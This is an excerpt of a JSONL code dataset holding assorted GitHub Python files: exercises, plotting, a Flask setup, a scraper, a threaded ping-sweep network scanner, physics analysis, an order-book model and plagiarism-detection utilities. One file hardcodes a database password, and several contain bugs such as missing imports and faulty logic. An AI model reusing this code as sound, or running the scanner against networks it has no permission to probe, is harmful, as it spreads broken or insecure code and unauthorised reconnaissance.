39, 87, 45, 50, 50, 50, 50, 40, 30, 3, 93, 39, 49, 88], \n [100, 1, 1, 4, 5, 90, 100, 20, 4, 5, 100, 100, 100, 100, 100, 93, 20, 15, 40, 90, 90, 90, 90, 90, 90, 33, 22, 44, 43, 34],\n]","repo_name":"jharbes/hashtagPython","sub_path":"008-listas-metodosEUsos/14-opcional-exercicios_extras_de_listas/listas.py","file_name":"listas.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41875147995","text":"from flask import Flask,request,render_template\r\nfrom models import *\r\n\r\napp = Flask(__name__)\r\nPOSTGRES = {\r\n 'user': 'postgres',\r\n 'pw': 'rakib1602066',\r\n 'db': 'mydatabase',\r\n 'host': 'localhost',\r\n 'port': '5432',\r\n}\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://%(user)s:\\\r\n%(pw)s@%(host)s:%(port)s/%(db)s' % POSTGRES\r\n#app.config[\"SQLALCHEMY_DATABASE_URL\"]=\"postgresql://postgres:rakib1602066@localhost/mydatabase\"\r\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\r\ndb.init_app(app)\r\n\r\n\r\ndef main():\r\n db.create_all()\r\n\r\n\r\nif __name__ == '__main__':\r\n with app.app_context():\r\n main()\r\n\r\n\r\n","repo_name":"RakibulIslamRakib/cs50","sub_path":"ORM/2create.py","file_name":"2create.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13032491757","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# 数据\niris = pd.read_csv('data/iris.csv')\nprint(iris.head())\n\n# 例子 1:\nsns.pairplot(iris, hue='Name', diag_kind='kde', size=2);\nplt.show()\n\n# 例子 2:\nplt.figure(figsize=(8,6))\nplt.subplot(121)\nsns.swarmplot('Name', 'PetalLength', data=iris);\nplt.subplot(122)\nsns.violinplot('Name', 'PetalLength', data=iris);\nplt.show()\n","repo_name":"shijiansu/coursera-applied-data-science-with-python","sub_path":"2_applied_data_representation/w4_applied_visualizations/1_pandas_visualization/5_seaborn_iris.py","file_name":"5_seaborn_iris.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20344186140","text":"import re\r\nimport sys\r\nimport os\r\nimport socket\r\nimport datetime\r\nimport subprocess\r\nimport threading\r\n\r\nhosts_up = 0\r\nhosts_down = 0\r\n\r\n#Function to find the ip address of the user.\r\ndef get_host_ip():\r\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\ts.connect((\"8.8.8.8\",80))\r\n\treturn s.getsockname()[0]\r\n\r\n#Fucntion to check whether an IP is alive.\r\ndef check_ip(IP):\r\n\tglobal hosts_up\r\n\tglobal hosts_down\r\n\ttry:\r\n\t\tif subprocess.call([\"ping\", IP],stdout=subprocess.PIPE) == 0: #This command peforms a ping request on the IP.\r\n\t\t\thosts_up = hosts_up + 1 #Counter for the number of live hosts\r\n\t\t\tprint(date_and_time + \" [+] {}: host is up.\".format(IP) + \" Number: \" + str(hosts_up)) \r\n\t\telse:\r\n\t\t\thosts_down = hosts_down + 1 #Counter for the number hosts down\r\n\t\t\tpass\r\n\t\t\t\r\n\texcept OSError:\r\n\t\tprint(date_and_time+\" [*] Unreachable Netowrk.\")\r\n\r\n\texcept KeyboardInterrupt:\r\n\t\tprint(\"[+] Cancelled!\")\r\n\t\tsys.exit()\r\n\r\ndef main_program():\r\n\tglobal date_and_time\r\n\ttry:\r\n\t\tnet = str(sys.argv[1]) #Takes the argument from the user.\r\n\r\n\t\tif net ==\"-h\": \r\n\t\t\tprint(\" Help\\n-----------\\nUsage: python pingsweep.py \\nEg: python pingsweep.py 127.0.0.1\\nEg: python pingsweep.py 127.0.0.1/24\") #Displays a help list.\r\n\t\t\tsys.exit()\r\n\r\n\t\telse:\r\n\t\t\tpass\r\n\r\n\texcept IndexError: #This exception handles a case where the user provides no argumnets.\r\n\t\tnet1 = (get_host_ip()).split(\".\")[:3]\r\n\t\tnet = \".\".join(net1) + \".0/24\"\r\n\r\n\r\n\r\n\tdate_and_time = str(datetime.datetime.now()) #show date and time.\r\n\tprint(date_and_time + \" [+] Scan started.\") \r\n\r\n\r\n\ttry:\r\n\t\tif re.search('/',net): #Searches for '/' in the argument provided by the user. \r\n\t\t\tif int(net.split(\"/\")[1]) > 24: #This condition checks whether the argument give by the user is out of range.\r\n\t\t\t\tprint(date_and_time + \" [-] {}: is not in your IP range.\".format(net))\r\n\r\n\t\t\telse:\r\n\t\t\t\ttotal = int(net[-2:]) + 230\r\n\t\t\t\tnet2 = net.split(\".\")[-1]\r\n\t\t\t\tnet3 = net2.split(\"/\")[-2]\r\n\t\t\t\tnet4 = net.split(\".\")\r\n\t\t\t\tthreads = []\r\n\t\t\t\tfor i in range(int(net3),total):\r\n\t\t\t\t\tip_range = f'''{\".\".join(net4[:3])}.{str(i)}'''\r\n\t\t\t\t\tthread = threading.Thread(target=check_ip, args=(ip_range,))\r\n\t\t\t\t\tthreads.append(thread)\r\n\r\n\t\t\t\tfor i in range(len(threads)):\r\n\t\t\t\t\tthreads[i].start()\r\n\r\n\r\n\t\telif int(net.split(\".\")[-1]) > 255: #This condition checks whether the argument give by the user is out of range.\r\n\t\t\tprint(date_and_time + \" [-] {}: is not in your IP range.\".format(net))\r\n\r\n\r\n\t\telse:\r\n\t\t\tcheck_ip(net)\r\n\r\n\texcept ValueError:\r\n\t\tcheck_ip(net)\r\n\r\nif __name__ == '__main__':\r\n\tmain_program()\r\n","repo_name":"theMcSam/IP-scanner","sub_path":"pingsweep.py","file_name":"pingsweep.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38868360034","text":"import numpy as np\nfrom scipy import integrate\nimport matplotlib.pyplot as plt\nimport h5py\n\n# Reading the data file for Phi4\nfile_name_psi=\"/home/ashok/gravitational_wave_memory_project/data/rMPsi4_Asymptotic_GeometricUnits_CoM.h5\"\nf_psi = h5py.File(file_name_psi,'r+')\n\n# Reading the strain data\nfile_name_h=\"/home/ashok/gravitational_wave_memory_project/data/rhOverM_Asymptotic_GeometricUnits_CoM.h5\"\nf_h = h5py.File(file_name_h,'r+')\n\n\n#reading data for time and l2m2 mode\ndata_psi = f_psi['Extrapolated_N4.dir']['Y_l2_m2.dat'][:]\ndata_h = f_h['Extrapolated_N4.dir']['Y_l2_m2.dat'][:]\ntime = np.array([])\nd2h22_real_by_dt2 = np.array([])\nd2h22_imag_by_dt2 = np.array([])\nh22_real_SXS=np.array([])\nh22_imag_SXS=np.array([])\n\n\nfor i in range(len(data_psi)):\n\ttime=np.append(time, data_psi[:][i][0])\n\td2h22_real_by_dt2=np.append(d2h22_real_by_dt2, data_psi[:][i][1])\n\td2h22_imag_by_dt2=np.append(d2h22_imag_by_dt2, data_psi[:][i][2])\n\th22_real_SXS=np.append(h22_real_SXS,data_h[:][i][1])\n\th22_imag_SXS=np.append(h22_imag_SXS,data_h[:][i][2])\n\n\n#intergrating the Phi4 data with respect to time first time\ndhSXS_dt_initial_real=np.gradient(h22_real_SXS, time)[0]\ndhSXS_dt_initial_imag=np.gradient(h22_imag_SXS, time)[0]\n\ndh22_real_by_dt=integrate.cumtrapz(d2h22_real_by_dt2, time,initial=0)\ndh22_imag_by_dt=integrate.cumtrapz(d2h22_imag_by_dt2, time, initial=0)\n\n#integrating the data second time with respect to time\n\nh22_real=integrate.cumtrapz(dh22_real_by_dt, time, initial=0)\nh22_imag=integrate.cumtrapz(dh22_imag_by_dt, time, initial=0)\n\n#making plots\nplt.plot(time, h22_real, 'g', label=\"h22 real\")\nplt.plot(time, h22_real_SXS,'r--', label=\"h22 real SXS\")\nplt.xlabel('time')\nplt.ylabel('h22 amplitude')\nplt.legend()\nplt.show()\n\nplt.plot(time, h22_real-h22_real_SXS)\nplt.plot(time, h22_imag-h22_imag_SXS)\nplt.show()\n\n#plt.savefig(\"/home/ashok/gravitational_wave_memory_project/plots/h22_plot2.pdf\")\n\n# Plot Psi4 data\ndh22_real_SXS_by_dt = np.gradient(h22_real_SXS, time)\ndh22_imag_SXS_by_dt = np.gradient(h22_imag_SXS, time)\n\nd2h22_real_SXS_by_dt2=np.gradient(dh22_real_SXS_by_dt, time)\nd2h22_imag_SXS_by_dt2=np.gradient(dh22_imag_SXS_by_dt, time)\n\nplt.plot(time,d2h22_real_SXS_by_dt2,'r--' )\nplt.plot(time,d2h22_real_by_dt2,'k' )\nplt.show()\n\n#Subtract linearfit\nlinear_fit_coeff_real = np.polyfit(time, h22_real, 3)\nlinear_fit_coeff_imag = np.polyfit(time, h22_imag, 3)\n\nlinear_fit_real=linear_fit_coeff_real[0]*time + linear_fit_coeff_real[1]\nplt.plot(time, h22_real-linear_fit_real,'r--', label=\"linear fit sub from h22\")\nplt.plot(time, h22_real_SXS, 'g', label=\"h22 SXS\")\nplt.legend()\nplt.show() \n\n\n\n\n\n\n \n \n\n\n\n\n\n","repo_name":"aschoudry/GWmemory","sub_path":"scripts/plot_h22mode.py","file_name":"plot_h22mode.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15982972632","text":"import torch\nimport torch.nn as nn\nimport torch.utils.data as data\n\nclass Template_SegmentationDataLoader(data.Dataset):\n def __init__(self, img_root, mask_root, img_list_path=None,\n pair_transform=None, input_transform=None, target_transform=None,\n load_all_in_ram=True, img_ext=\".jpg\", mask_ext=\".png\", return_original=False):\n \"\"\"\n args:\n img_root: str\n root directory of images.\n\n mask_root: str\n root directory of mask images.\n\n img_list_path: str\n path to the file which is written a image name.\n if this is \"not\" None, it will only use this image written in this file.\n it is considered to be like\n img_001\n img_002\n img_003\n .\n .\n .\n in the file.\n if this is None, it will read all file in the img_root directory.\n in this scenario, if you set load_all_in_ram=False, it might raise some\n errors if there is a non opneable file with PIL in the directory or no pairs.\n setting the option of img_exr, or mask_ext to use different extensions.\n\n pair_transform: function\n function that compose transform to PIL.Image object for image and mask.\n this function must take 2 PIL.Image object which is (image, mask).\n if it is None, nothing will be done.\n\n input_transform: function\n function that compose transform to PIL.Image object for image.\n torchvision.transforms is considered as a typical function.\n if it is None, transforms.ToTensor will only be performed.\n\n target_transform: function\n function that compose transform to PIL.Image object for mask.\n torchvision.transforms is considered as a typical function.\n if it is None, it will convert to torch.LongTensor.\n\n load_all_in_ram: bool\n if this is True. the all dataset image will be loaded on the memory.\n if you cause no memory problem, you can set this to False,\n and this loader will only load the file paths at the initial moment.\n\n img_ext: str\n extension for image.\n mask_ext: str\n extension for mask image.\n \"\"\"\n\n self.input_transform = input_transform\n self.target_transform = target_transform\n self.pair_transform = pair_transform\n self.load_all_in_ram = load_all_in_ram\n self.img_ext = img_ext\n self.mask_ext = mask_ext\n self.return_original = return_original\n\n # all images must have pairs\n if img_list_path is None:\n name_list = []\n image_list = os.listdir(os.path.join(img_root))\n for name in image_list:\n name_list.append(name.replace(img_ext, \"\").replace(mask_ext, \"\"))\n\n image_list = list(set(*name_list))\n\n else:\n with open(os.path.join(img_list_path), \"r\") as file:\n image_list = file.readlines()\n image_list = [img_name.rstrip(\"\\n\") for img_name in image_list]\n\n self.image_names = image_list\n\n self.imgs = []\n self.mask_imgs = []\n\n for img_name in self.image_names:\n try:\n if load_all_in_ram:\n _img = Image.open(os.path.join(img_root, img_name+self.img_ext)).convert('RGB')\n _mask_img = Image.open(os.path.join(mask_root, img_name+self.mask_ext)).convert('P')\n else:\n _img = os.path.join(img_root, img_name+self.img_ext)\n _mask_img = os.path.join(mask_root, img_name+self.mask_ext)\n\n\n self.imgs.append(_img)\n self.mask_imgs.append(_mask_img)\n\n except Exception as e:\n print(e)\n print(\"pass {}\".format(img_name))\n\n self.data_num = len(self.imgs)\n \n def __getitem__(self, index):\n if self.load_all_in_ram:\n img = self.imgs[index]\n mask = self.mask_imgs[index]\n else:\n img = Image.open(self.imgs[index]).convert('RGB')\n mask = Image.open(self.mask_imgs[index]).convert('P')\n\n if self.pair_transform is not None:\n _img, _mask_img = self.pair_transform(img, mask)\n else:\n _img = img\n _mask_img = mask\n\n if self.return_original:\n original_img = _img.copy()\n \n if self.input_transform is not None:\n _img = self.input_transform(_img)\n else:\n _img = torch.from_numpy(np.asarray(_img).transpose(2,0,1)).type(torch.FloatTensor)\n \n if self.target_transform is not None:\n _mask_img = self.target_transform(_mask_img)\n else:\n _mask_img = torch.from_numpy(np.asarray(_mask_img)).type(torch.LongTensor)\n\n if self.return_original:\n return _img, _mask_img, torch.from_numpy(np.asarray(original_img)).type(torch.LongTensor)\n\n return _img, _mask_img\n\n def __len__(self):\n return self.data_num\n","repo_name":"a-maumau/mau_ml_util","sub_path":"templates/template_data_loader.py","file_name":"template_data_loader.py","file_ext":"py","file_size_in_byte":5525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21827807257","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom typing import Optional, Sequence, Tuple\nfrom dataclasses import replace\n\n\n'''\nFacilitates matching stock buyers with stock sellers\n\nBuyers and sellers express intrest to trade by:\nBids (intent to buy)\nasks (intent to sell)\nknown as limit orders\n\"limit\" only interested in buying below a certain price levels\nea LO = (P, N) ; P = price, N = shares\n=> buy LO (P, N) = willing to buy N shares at price <= P\n\nOtehr type:\nMarket Order (MO)\nstates one intet to buy/sell N shares at the best possible price(S) available \non OB at the time of MO submission\n'''\n\n@dataclass(frozen = True)\nclass DollarsAndShares: \n '''\n Can represent an LO\n or pair of total dollors transacted when MO exectuted\n '''\n dollars: float\n shares: int\nPriceSizePairs = Sequence[DollarsAndShares]\n\n@dataclass(frozen=True)\nclass OrderBook:\n\n descending_bids: PriceSizePairs\n ascending_asks: PriceSizePairs\n\n def bid_price(self) -> float:\n return self.descending_bids[0].dollars\n \n def ask_price(self) -> float:\n return self.ascending_asks[0].dollars\n \n def mid_price(self) -> float:\n return (self.bid_price() + self.ask_price()) / 2\n \n def bid_ask_spread(self) -> float:\n return self.ask_price() - self.bid_price()\n\n def market_depth(self) -> float:\n return self.ascending_asks[-1].dollars - \\\n self.descending_bids[-1].dollars\n\n @staticmethod\n def eat_book(\n ps_pairs: PriceSizePairs, \n shares: int) -> Tuple[DollarsAndShares, PriceSizePairs]:\n '''\n Method for LO and MO interaction with OrderBook\n '''\n rem_shares: int = shares\n dollars: float = 0\n for i, d_s in enumerate(ps_pairs):\n this_price: float = d_s.dollars\n this_shares: int = d_s.shares\n dollars += this_price * min(rem_shares, this_shares)\n if rem_shares < this_shares:\n return(\n DollarsAndShares(dollars=dollars, shares=shares),\n [DollarsAndShares(\n dollars=this_price,\n shares=this_shares - rem_shares\n )] + list(ps_pairs[i+1:])\n )\n else:\n rem_shares -= this_shares\n return (\n DollarsAndShares(dollars=dollars, shares=shares - rem_shares),\n []\n )\n \n def sell_limit_order(self, price: float, shares: int) -> \\\n Tuple[DollarsAndShares, OrderBook]:\n \n index: Optional[int] = next((i for i, d_s\n in enumerate(self.descending_bids)), None)\n eligible_bids: PriceSizePairs = self.descending_bids \\\n if index is None else self.descending_bids[:index]\n ineligible_bids: PriceSizePairs = [] if index is None else \\\n self.descending_bids[index:]\n\n d_s, rem_bids = OrderBook.eat_book(eligible_bids, shares)\n new_bids: PriceSizePairs = list(rem_bids) + list(ineligible_bids)\n rem_shares: int = shares - d_s.shares\n\n if rem_shares > 0:\n new_asks: list[DollarsAndShares] = list(self.ascending_asks)\n index1: Optional[int] = next((i for i, d_s\n in enumerate(new_asks)\n if d_s.dollars >= price), None)\n \n if index1 is None:\n new_asks.append(DollarsAndShares(\n dollars=price,\n shares=rem_shares\n ))\n elif new_asks[index1].dollars != price:\n new_asks.insert(index1, DollarsAndShares(\n dollars=price,\n shares=rem_shares\n ))\n else:\n new_asks[index1] = DollarsAndShares(\n dollars=price,\n shares=new_asks[index1].shares + rem_shares\n )\n return d_s, OrderBook(\n ascending_asks=new_asks,\n descending_bids=new_bids\n )\n else:\n return d_s, replace(\n self,\n descending_bids=new_bids\n )\n \n def sell_market_order(\n self, \n shares: int\n ) -> Tuple[DollarsAndShares, OrderBook]:\n d_s, rem_bids = OrderBook.eat_book(\n self.descending_bids, \n shares\n )\n return (d_s, replace(self, descending_bids=rem_bids))\n\n def pretty_print_order_book(self) -> None:\n from pprint import pprint\n print()\n print(\"Bids\")\n pprint(self.descending_bids)\n print()\n print(\"Asks\")\n print()\n pprint(self.ascending_asks)\n print()\n \n def display_order_book(self) -> None:\n import matplotlib.pyplot as plt\n\n bid_prices = [d_s.dollars for d_s in self.descending_bids]\n bid_shares = [d_s.shares for d_s in self.descending_bids]\n if self.descending_bids:\n plt.bar(bid_prices, bid_shares, color='blue')\n\n ask_prices = [d_s.dollars for d_s in self.ascending_asks]\n ask_shares = [d_s.shares for d_s in self.ascending_asks]\n if self.ascending_asks:\n plt.bar(ask_prices, ask_shares, color='red')\n\n all_prices = sorted(bid_prices + ask_prices)\n all_ticks = [\"%d\" % x for x in all_prices]\n plt.xticks(all_prices, all_ticks)\n plt.grid(axis='y')\n plt.xlabel(\"Prices\")\n plt.ylabel(\"Number of Shares\")\n plt.title(\"Order Book\")\n #plt.xticks(x_pos, x)\n plt.show()\n\nif __name__ == \"__main__\":\n \n from numpy.random import poisson\n\n bids: PriceSizePairs = [DollarsAndShares(\n dollars=x,\n shares=poisson(100. - (100 - x) * 10)\n ) for x in range(100, 90, -1)]\n asks: PriceSizePairs = [DollarsAndShares(\n dollars=x,\n shares=poisson(100. - (x - 105) * 10)\n ) for x in range(105, 115, 1)]\n #initalise a testing OrderBook\n ob0 = OrderBook = OrderBook(descending_bids=bids, ascending_asks=asks)","repo_name":"hadwi537/OrderBook","sub_path":"OrderBook/OrderBook.py","file_name":"OrderBook.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24396138626","text":"import scrapy\n\n\nclass GlassesSpider(scrapy.Spider):\n name = 'glasses'\n allowed_domains = ['www.glassesshop.com']\n \n def start_requests(self):\n yield scrapy.Request(url='https://www.glassesshop.com/bestsellers',callback=self.parse, headers={\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36'\n })\n\n def parse(self, response):\n glasses =response.xpath(\"//div[@id='product-lists']/div\")\n for glasses_ in glasses:\n yield{\n 'url': glasses_.xpath(\".//div[@class='product-img-outer']/a/@href\").get(),\n 'image_url': glasses_.xpath(\".//img[@class='lazy d-block w-100 product-img-default']/@src\").get(),\n 'product_name': glasses_.xpath(\"normalize-space(.//div[@class='p-title']/a/text())\").get(),\n 'price': glasses_.xpath(\".//div[@class='p-price']//span/text()\").get(),\n # 'User-Agent': response.request.headers['User-Agent']\n }\n next_page = response.xpath(\n \"//lu[@class='pagination']/li[position()=last()]/a/@href\").get()\n if next_page:\n yield scrapy.Request(url=next_page, callback=self.parse,headers={\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36'\n })\n\n ","repo_name":"david-adds/glassesshop-spider","sub_path":"glassesshop/spiders/glasses.py","file_name":"glasses.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32376187655","text":"\"\"\"\nWrite a function that, given three integers A, B and K, \nreturns the number of integers within the range [A..B] that are divisible by K.\nFor example, for A = 6, B = 11 and K = 2, your function should return 3.\n\"\"\"\n\ndef solution(A, B, K):\n if A % K == 0: \n # we add 1 to the count because A itself is divisible by K\n return (B - A) // K + 1\n else: \n # we subtract A % K from A to get \n # the first integer within the range that is divisible by K \n return (B - (A - A % K )) // K\n\nA = 6\nB = 11\nK = 2\nprint(solution(A,B,K))\n","repo_name":"ssuzana/codility-practice","sub_path":"05-prefix-sums/CountDiv.py","file_name":"CountDiv.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7274285830","text":"\"\"\"This module contains functions for tokenizing/filtering code\nas well as generic functions for detecting overlap between two\ndocuments.\n\"\"\"\n\nimport logging\nimport warnings\nfrom typing import Dict, List\n\nfrom pygments import lexers, token\nimport pygments.util\nimport numpy as np\nfrom markupsafe import escape\n\n# if the C extention is available, use it. For almost all use cases\n# the speed difference is not significant so if the C extention isn't\n# found copydetect will silenty switch to the python implementation.\ntry:\n from .winnow import _winnow\nexcept (ModuleNotFoundError, ImportError):\n from .pywinnow import _winnow\n\ndef filter_code(code, filename, language=None):\n \"\"\"Tokenize and filter a code document. Replace variable names with\n V, function names with F, object names with O, and strings with S.\n Return the filtered document and a list of offsets indicating how\n many characters were removed by filtering at each index in the\n resulting document where filtering occured (this is used later to\n highlight the original code using plagiarism detection results on\n the filtered code)\n \"\"\"\n try:\n if language is not None:\n lexer = lexers.get_lexer_by_name(language)\n else:\n lexer = lexers.get_lexer_for_filename(filename)\n tokens = lexer.get_tokens(code)\n except pygments.util.ClassNotFound:\n logging.warning(f\"{filename} not tokenized: unknown file extension\")\n return code, np.array([])\n\n if lexer == pygments.lexers.TextLexer:\n logging.warning(f\"did not tokenize plaintext file {filename}\")\n return code, np.array([])\n\n out_code = \"\"\n offset = 0\n offsets = [[0,0]]\n variable_tokens = {token.Name, token.Name.Variable, token.Name.Attribute}\n for t in tokens:\n if t[0] in variable_tokens:\n out_code += \"V\"\n offsets.append([len(out_code) - 1, offset])\n offset += len(t[1]) - 1\n elif t[0] in token.Name.Function:\n out_code += \"F\"\n offsets.append([len(out_code) - 1, offset])\n offset += len(t[1]) - 1\n elif t[0] in token.Name.Class:\n out_code += \"O\"\n offsets.append([len(out_code) - 1, len(t[1]) - 1])\n offset += len(t[1]) - 1\n elif t[0] == token.Comment.Preproc or t[0] == token.Comment.Hashbang:\n out_code += \"P\"\n offsets.append([len(out_code) - 1, offset])\n offset += len(t[1]) - 1\n elif t[0] in token.Text or t[0] in token.Comment:\n offsets.append([len(out_code) - 1, offset])\n offset += len(t[1])\n elif t[0] in token.Literal.String:\n if t[1] == \"'\" or t[1] == '\"':\n out_code += '\"'\n else:\n out_code += \"S\"\n offsets.append([len(out_code) - 1, offset])\n offset += len(t[1]) - 1\n else:\n out_code += t[1]\n return out_code, np.array(offsets)\n\ndef hashed_kgrams(string, k):\n \"\"\"Return hashes of all k-grams in a string\"\"\"\n hashes = [hash(string[offset:offset+k])\n for offset in range(len(string) - k + 1)]\n return np.array(hashes)\n\ndef winnow(hashes, window_size, remove_duplicates=True):\n \"\"\"implementation of the robust winnowing algorithm decribed in\n https://theory.stanford.edu/~aiken/publications/papers/sigmod03.pdf\n Returns a list of selected hashes and the indexes of those hashes.\n \"\"\"\n if window_size < 1:\n raise ValueError(\"window_size must be greater than 0\")\n\n # window size of 1 will just select all hashes\n if window_size == 1:\n selected_hashes = hashes\n selected_idx = np.arange(len(hashes))\n else:\n selected_idx = _winnow(hashes, window_size)\n selected_hashes = hashes[selected_idx]\n\n if remove_duplicates:\n selected_hashes, unique_idx = np.unique(selected_hashes,\n return_index=True)\n selected_idx = selected_idx[unique_idx]\n\n return selected_hashes, selected_idx\n\ndef get_copied_slices(idx, k):\n \"\"\"Given k and a list of indexes detected by\n find_fingerprint_overlap, generates a list of slices where the\n copied code begins and ends. Returns a 2D array where the first\n dimension is slice start locations and the second dimension is\n slice end locations.\n \"\"\"\n if len(idx) == 0:\n return np.array([[],[]])\n\n # determine the gaps between slices (called skips)\n sorted_idx = np.sort(idx)\n next_idx = np.concatenate([sorted_idx[1:], [0]])\n skips = np.where(next_idx - sorted_idx > k - 1)[0]\n\n # use the elements around the gaps to compute slice start/ends\n slice_starts = np.concatenate([[sorted_idx[0]], sorted_idx[skips + 1]])\n slice_ends = np.concatenate([sorted_idx[skips]+k, [sorted_idx[-1]+k]])\n\n return np.array([slice_starts, slice_ends])\n\ndef get_document_fingerprints(doc, k, window_size, boilerplate=None):\n \"\"\"Given a document, computes all k-gram hashes and uses the\n winnowing algorithm to reduce their number. Optionally takes a\n list of boilerplate hashes to remove from the winnowed list.\n Returns the selected hashes and their indexes in the original list\n \"\"\"\n if boilerplate is None:\n boilerplate = []\n all_hashes = hashed_kgrams(doc, k=k)\n hashes, idx = winnow(\n all_hashes, window_size=window_size, remove_duplicates=False\n )\n if len(boilerplate) > 0:\n _, overlap_idx, _ = np.intersect1d(hashes, boilerplate,\n return_indices=True,\n assume_unique=True)\n idx = np.delete(idx, overlap_idx)\n hashes = np.delete(hashes, overlap_idx)\n\n hash_dict = {}\n for hash_val, i in zip(hashes, idx):\n if hash_val not in hash_dict:\n hash_dict[hash_val] = [i]\n else:\n hash_dict[hash_val].append(i)\n return set(hashes), hash_dict\n\ndef find_fingerprint_overlap(hashes1, hashes2, idx1, idx2):\n \"\"\"Finds the indexes of overlapping values between two lists of\n hashes. Returns two lists of indexes, one for the first hash list\n and one for the second. The indexes of the original hashes are\n provided in case boilerplate results in gaps.\n \"\"\"\n intersection = hashes1.intersection(hashes2)\n if len(intersection) > 0:\n overlap_1 = np.concatenate([np.array(idx1[i]) for i in intersection])\n overlap_2 = np.concatenate([np.array(idx2[i]) for i in intersection])\n return overlap_1.flatten(), overlap_2.flatten()\n else:\n return np.array([], dtype=int), np.array([], dtype=int)\n\ndef highlight_overlap(doc, slices, left_hl, right_hl,\n truncate=-1, escape_html=False):\n \"\"\"Highlights copied code in a document given the slices containing\n copied code and strings to use for the highlight start and end.\n Returns the document annoted with the highlight strings as well as\n the percentage of code which was highlighted. If truncate is set to\n an integer, everything not within that many lines of highlighted\n code will be replaced with \"...\"\n \"\"\"\n if slices.shape[0] > 0:\n hl_percent = np.sum(slices[1] - slices[0])/len(doc)\n else:\n warnings.warn(\"empty slices array\")\n return doc, 0\n\n new_doc = \"\"\n current_idx = 0\n for slice_idx in range(slices.shape[1]):\n start_idx = slices[0,slice_idx]\n end_idx = slices[1,slice_idx]\n\n if escape_html:\n pre_highlight = str(escape(doc[current_idx:start_idx]))\n highlighted = left_hl+str(escape(doc[start_idx:end_idx]))+right_hl\n else:\n pre_highlight = doc[current_idx:start_idx]\n highlighted = left_hl + doc[start_idx:end_idx] + right_hl\n\n if truncate >= 0:\n lines = pre_highlight.split(\"\\n\")\n if slice_idx != 0 and len(lines) > truncate*2:\n pre_highlight = (\"\\n\".join(lines[:truncate+1]) + \"\\n\\n...\\n\\n\"\n + \"\\n\".join(lines[-truncate - 1:]))\n elif len(lines) > truncate:\n pre_highlight = \"\\n\".join(lines[-truncate - 1:])\n\n new_doc += pre_highlight + highlighted\n current_idx = end_idx\n\n if escape_html:\n post_highlight = str(escape(doc[current_idx:]))\n else:\n post_highlight = doc[current_idx:]\n\n if truncate >= 0:\n lines = post_highlight.split(\"\\n\")\n if len(lines) > truncate:\n post_highlight = \"\\n\".join(lines[:truncate])\n new_doc += post_highlight\n\n return new_doc, hl_percent\n\ndef get_token_coverage(idx: Dict[int, List[int]], k: int, token_len: int):\n \"\"\"Determines the number of tokens in the original document which\n are included in the winnowed indices\n \"\"\"\n if len(idx) > 0:\n idx_arr = np.concatenate([np.array(i) for i in idx.values()])\n else:\n idx_arr = np.array([], dtype=int)\n coverage = np.zeros(token_len)\n for offset in range(k):\n coverage[idx_arr + offset] = 1\n return np.sum(coverage)\n","repo_name":"blingenf/copydetect","sub_path":"copydetect/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9088,"program_lang":"python","lang":"en","doc_type":"code","stars":175,"dataset":"github-code","pt":"53"} +{"seq_id":"3591603244","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n#=============================================================================\n# FileName:\n# Desc:\n# Author: 白开水\n# Email: vekergu@163.com\n# HomePage: https://github.com/vekergu\n# Version: 0.0.1\n# LastChange: \n# History:\n#=============================================================================\nfrom __future__ import print_function\n'''\n题目:猴子吃桃问题:猴子第一天摘下若干个桃子,当即吃了一半,还不瘾,又多吃了一个第二天早上又将剩下的桃子吃掉一半,又多吃了一个。以后每天早上都吃了前一天剩下的一半零一个。到第10天早上想再吃时,见只剩下一个桃子了。求第一天共摘了多少。\n程序分析:采取逆向思维的方法,从后往前推断。\n\n1 3 5\nn*2 +1\n'''\n\nn = 1\nfor i in range(9,0,-1):\n n = (n+1)*2\n\nprint(n)","repo_name":"vekergu/ops_doc","sub_path":"learn_python/python练习100题/021_猴子吃桃.py","file_name":"021_猴子吃桃.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30169731293","text":"#! /usr/bin/env python\n#-----------------------------------------\n#\tSystem_Sim.py\n#\t\n#\tcs402: Making Appliances \"Self Aware\"\n#\t\n#\tJason Derrick (lead)\n#\tMark Bolles\n#\tTravis Brown\n#\tRyan Tungett\n#-----------------------------------------\n#\t\n#------------\n#\t\n#-----------------------------------------\nimport socket\nimport sys\nimport random\nimport re\nimport time\nfrom threading import Thread\n\n\n#=========================================\n#====== Global Variables (settings) ======\n\nRUN_SIM = True\nSIM_LENGTH = 1 # number of mintues simulation will run before 